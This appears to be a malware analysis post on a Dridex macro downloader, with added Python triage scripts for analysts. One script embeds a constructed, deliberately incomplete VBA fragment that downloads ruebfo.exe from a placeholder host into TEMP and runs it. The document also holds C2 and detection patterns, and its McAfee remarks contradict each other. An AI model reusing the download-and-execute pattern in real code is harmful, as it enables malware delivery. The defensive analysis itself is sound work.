Dridex Downloader

Recently we have been hearing of the rise of VB macro-based downloaders and other kinds of malware used as the first stage of a multi-stage attack. FireEye, in a blog post, mentioned the use of macro-based documents as the IIV (Initial Infection Vector) for banking trojans such as Dridex.

This time the malicious document file has the extension .doc and not .docm (the compressed, newer Word file format with embedded macros). The .doc extension is most probably used instead of .docm to get through file filters on the email security gateway, where macro-enabled extensions might be blocked.

The file does not contain any text, and a lot of unused code is found in the VBA macro; this code is irrelevant and most probably placed there for anti-analysis purposes. The actual malicious code that acts as the downloader is obfuscated.

Similar techniques are deployed: an object is used to download the payload into the temp folder and run the malicious binary.


The Microsoft.XMLHTTP object is used to send a GET request to the malicious website to download the second-stage binary.

This is the de-obfuscated GET request, in which we can see the URL of the second-stage binary.

The second-stage binary is copied to the temp folder under the name ruebfo.exe.
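The macro described above (dead code for anti-analysis, an obfuscated string that resolves to Microsoft.XMLHTTP, a GET for the payload, a copy to the temp folder and a launch) can be triaged without running it. The following is an added example of an analyst-side script; it is not code from the post or from the sample. The VBA fragment it scans is constructed here, its Chr()/"&" obfuscation style is an assumption (the post does not show the real technique), and the hostname is a placeholder.

```python
import re

# Constructed VBA fragment in the style the post describes: unused procedures
# plus an obfuscated downloader routine. Deliberately incomplete (no stream
# write), so it is an analysis target, not a working downloader. The
# obfuscation style and the hostname example.invalid are assumptions.
SAMPLE_VBA = r'''
Sub UnusedProc1()
    Dim a As Integer
    a = 5 * 7
End Sub

Sub UnusedProc2()
    Dim b As String
    b = "nothing"
End Sub

Sub AutoOpen()
    Dim o As Object, s As Object
    Set o = CreateObject(Chr(77) & "icrosoft." & Chr(88) & "MLHTTP")
    o.Open Chr(71) & "ET", "http://" & "example.invalid" & "/ruebfo.exe", False
    o.send
    Set s = CreateObject("Adodb." & Chr(83) & "tream")
    s.SaveToFile Environ("TEMP") & "\ruebfo.exe", 2
    Shell Environ("TEMP") & "\ruebfo.exe"
End Sub
'''

CHR_RE = re.compile(r"Chr\((\d+)\)")
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
URL_RE = re.compile(r'https?://[^\s"]+')
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.M)
AUTO_EXEC = {"AutoOpen", "Document_Open", "Auto_Open", "Workbook_Open", "AutoExec"}

# Behaviours the post calls out, expressed as patterns over de-obfuscated source.
INDICATORS = {
    "xmlhttp_object": r"Microsoft\.XMLHTTP",
    "stream_to_disk": r"Adodb\.Stream|SaveToFile",
    "temp_folder": r'Environ\("TEMP"\)',
    "process_launch": r"\bShell\b|WScript\.Shell",
    "auto_exec_entry": r"\b(?:AutoOpen|Document_Open|Auto_Open|Workbook_Open)\b",
}


def deobfuscate(src):
    """Turn Chr(n) into a string literal, then fold "a" & "b" into "ab" until stable."""
    text = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', src)
    while True:
        folded = CONCAT_RE.sub(r'"\1\2"', text)
        if folded == text:
            return text
        text = folded


def dead_procedures(src):
    """Procedures that are defined but never referenced anywhere else (the padding the post mentions)."""
    names = PROC_RE.findall(src)
    return [
        n for n in names
        if n not in AUTO_EXEC
        and len(re.findall(r"\b%s\b" % re.escape(n), src)) <= 1
    ]


def triage_macro(src):
    """De-obfuscate, then report indicators, URLs, dead code and a simple verdict."""
    clean = deobfuscate(src)
    hits = {name: bool(re.search(pat, clean, re.I)) for name, pat in INDICATORS.items()}
    # Download object plus a process launch is the download-and-execute pattern.
    verdict = "suspicious" if hits["xmlhttp_object"] and hits["process_launch"] else "review"
    return {
        "indicators": hits,
        "urls": URL_RE.findall(clean),
        "dead_procedures": dead_procedures(clean),
        "verdict": verdict,
    }


if __name__ == "__main__":
    report = triage_macro(SAMPLE_VBA)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The string folding is deliberately naive (it only handles literal-to-literal concatenation), which is enough to recover the object name and URL from this style of obfuscation; for real samples the VBA source would first be pulled out of the .doc with a tool such as olevba and fed to `triage_macro`.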

The second-stage binary was downloaded, and its MD5 hash is: e476dc4261c3848a06cc2cc62195dd55

Scanning the file with McAfee didn't yield any detections, but Malwarebytes was able to detect the binary as Backdoor.Bot.

Strangely, McAfee also detects the file as generic packed, but when we scanned the binary with McAfee AV it was not able to detect anything.

The file is shown as not packed by Exeinfo. However, we are not able to find any useful strings when we try to extract strings from the file.

A dynamic behavior analysis of the binary shows some interesting strings and behavior. The Process Hacker utility can be used to extract strings from the running binary (from memory), and some interesting strings can be seen below.

We can see the IP address and port of the C2 server, which is used to establish a TCP connection. We can also see the HTTP POST request method, which could be used for a range of things, from returning the results of C2 commands to the C2 server to data exfiltration. We can also see cryptnet.dll, indicating that the main part of the code could be encrypted.
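The contrast drawn above (no useful strings on disk, but a C2 address, an HTTP POST and a DLL name visible in the running process) comes down to where the strings are extracted from and what is then pulled out of them. The following is an added example of that extraction and triage step; it is not code from the post. The memory chunk is constructed, not a dump of the sample, the IP is from the 192.0.2.0/24 documentation range, the URI path is a placeholder, and the single-byte XOR used to model the on-disk copy is an assumption (the post does not say how the binary hides its strings).

```python
import re

# Constructed stand-in for a region of the running process's memory, in the
# spirit of what Process Hacker shows; not a real dump of the sample.
MEMORY_CHUNK = (
    b"\x00\x8f\x12"
    + b"192.0.2.10:443\x00\x00"                      # placeholder C2 (documentation range)
    + b"POST /gate.php HTTP/1.1\r\n\x03\x7f"         # placeholder request line
    + "User-Agent: Mozilla/4.0".encode("utf-16-le") + b"\x00\x00"  # wide string
    + b"cryptnet.dll\x00\xde\xad\xbe\xef"
    + b"ab\x00"                                       # too short to be reported
)

# Constructed stand-in for the same region as it sits in the file on disk.
# XOR 0xFF is only an assumption that hides the text; it maps every printable
# byte outside the printable range, so static string extraction finds nothing.
ON_DISK_CHUNK = bytes(b ^ 0xFF for b in MEMORY_CHUNK)

IP_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")
HTTP_RE = re.compile(r"^(GET|POST|PUT|HEAD) (\S+) HTTP/1\.[01]")
DLL_RE = re.compile(r"\b[\w.-]+\.dll\b", re.I)


def extract_strings(buf, min_len=4):
    """Return printable ASCII and UTF-16LE runs of at least min_len characters (what 'strings' does)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(buf)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(buf)]
    return found


def triage_strings(strings):
    """Pull network IoCs and loaded-library hints out of extracted strings."""
    report = {"c2": [], "http_requests": [], "dlls": [], "notes": []}
    for s in strings:
        m = IP_PORT_RE.search(s)
        if m:
            report["c2"].append((m.group(1), int(m.group(2))))
        m = HTTP_RE.match(s)
        if m:
            report["http_requests"].append((m.group(1), m.group(2)))
        report["dlls"].extend(DLL_RE.findall(s))
    if any(d.lower() == "cryptnet.dll" for d in report["dlls"]):
        report["notes"].append("cryptnet.dll referenced: cryptographic API in use, payload may be encrypted")
    return report


def static_vs_dynamic():
    """Counts that make the post's point: nothing on disk, everything in memory."""
    return len(extract_strings(ON_DISK_CHUNK)), len(extract_strings(MEMORY_CHUNK))


if __name__ == "__main__":
    on_disk, in_memory = static_vs_dynamic()
    print(f"strings on disk: {on_disk}, strings in memory: {in_memory}")
    for key, value in triage_strings(extract_strings(MEMORY_CHUNK)).items():
        print(f"{key}: {value}")
```

The IP:port and request-line patterns are what an analyst would turn into network detections (a firewall or proxy block on the address, an IDS rule on the POST path); because they only appear once the binary is running, the memory-side extraction is the step that yields them.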